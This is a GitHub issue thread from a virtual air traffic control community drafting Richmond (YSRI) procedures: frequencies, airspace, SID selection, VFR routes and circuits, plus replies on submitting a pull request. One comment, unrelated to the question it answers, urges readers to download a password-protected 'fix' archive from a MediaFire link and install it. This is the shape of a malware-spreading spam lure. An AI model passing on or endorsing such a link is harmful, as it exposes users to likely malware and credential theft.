### ISSUE TITLE
YSRI Procedures

### ISSUE THREAD

**Issue by ST6-Bravo** [vatpac-technology/sops#303]
Positions

Richmond ADC - Ric Tower - 135.5 
Richmond SMC - Ric Ground - 128.25
Richmond Atis - Ric ATIS - 126.3

Airspace

RIC ADC  owns the Class C airspace in the RIC CTR within 10 nm of the SYD ARP from SFC to A045. This airspace is primarily used for military circuits, initial and pitch approaches, and airdrops.

YSRI Aerodrome

SID Selection, aircraft planned via ANKUB, KADOM, MUDGI or SCO shall be assigned the Procedural SID that terminates at the appropriate waypoint. Aircraft who are not planned via those points or who are negative RNAV may be assigned a RADAR SID or a visual departure.  

Departing aircraft will be issued A050 or lower depending on flight planned level.

VFR aircraft are to fly an outbound altitude of 1500 and turn left or right above the towns towards the training area.

VFR aircraft are to fly an inbound altitude of 1500 and call the tower at Londonderry, Lighthorse interchange, Glossodia or Wilberforce for airways clearance.   

Circuits

All circuits are left handed for both 10/28, calls are to be made on base, however  with the desire for circuits to be conducted to the north due to noise abatement. 

Initial and Pitch 

The initial point will be 5nm from the tacan on the dead side of the active runway at 1500 ft AGL for a left initial and pitch.

Miscellaneous 

Richmond has a Northern and Southern Training Area see the RAAF FIHA for greater detail.

**Comment by alphadelta332** [comment]
> Positions
> 
> Richmond ADC - Ric Tower - 135.5 Richmond SMC - Ric Ground - 128.25 Richmond Atis - Ric ATIS - 126.3
> 
> Airspace
> 
> RIC ADC owns the Class C airspace in the RIC CTR within 10 nm of the SYD ARP from SFC to A045. This airspace is primarily used for military circuits, initial and pitch approaches, and airdrops.
> 
> YSRI Aerodrome
> 
> SID Selection, aircraft planned via ANKUB, KADOM, MUDGI or SCO shall be assigned the Procedural SID that terminates at the appropriate waypoint. Aircraft who are not planned via those points or who are negative RNAV may be assigned a RADAR SID or a visual departure.
> 
> Departing aircraft will be issued A050 or lower depending on flight planned level.
> 
> VFR aircraft are to fly an outbound altitude of 1500 and turn left or right above the towns towards the training area.
> 
> VFR aircraft are to fly an inbound altitude of 1500 and call the tower at Londonderry, Lighthorse interchange, Glossodia or Wilberforce for airways clearance.
> 
> Circuits
> 
> All circuits are left handed for both 10/28, calls are to be made on base, however with the desire for circuits to be conducted to the north due to noise abatement.
> 
> Initial and Pitch
> 
> The initial point will be 5nm from the tacan on the dead side of the active runway at 1500 ft AGL for a left initial and pitch.
> 
> Miscellaneous
> 
> Richmond has a Northern and Southern Training Area see the RAAF FIHA for greater detail.

Would you be interested in submitting a pull request for Richmond SOPs, so the ATS team can review it and hopefully get it put in to the Local Instructions?

**Comment by ST6-Bravo** [comment]
How do I make it a pull request?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mattkelly4** [comment]
> How do I make it a pull request?

Easiest way is to head to https://sops.vatpac.org/assist-us/setup/ and get a local version of the SOPs running. From there, you can make your changes. When you're done, head back here and you should get an option to submit a pull request from your copy of the repo to our master copy. If you need help, we can assist via discord.

**Comment by Slep-wt** [comment]
Due to duplicate SID constraints with vatsys (Mainly the KADOM3/4 iirc), you'll have to pick one, or just default to the RIC (RADAR) SID instead. It might be more useful as SAN can tactically manage departures, as none of the YSRI SID's have strategic separation with Sydney procedures.
